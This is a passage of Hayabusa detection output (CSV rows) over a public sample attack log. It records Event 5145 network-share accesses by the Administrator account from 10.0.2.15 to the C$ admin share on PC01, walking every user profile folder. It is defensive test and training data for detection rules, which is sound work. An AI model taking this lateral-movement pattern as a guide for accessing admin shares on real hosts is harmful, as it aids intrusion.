Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 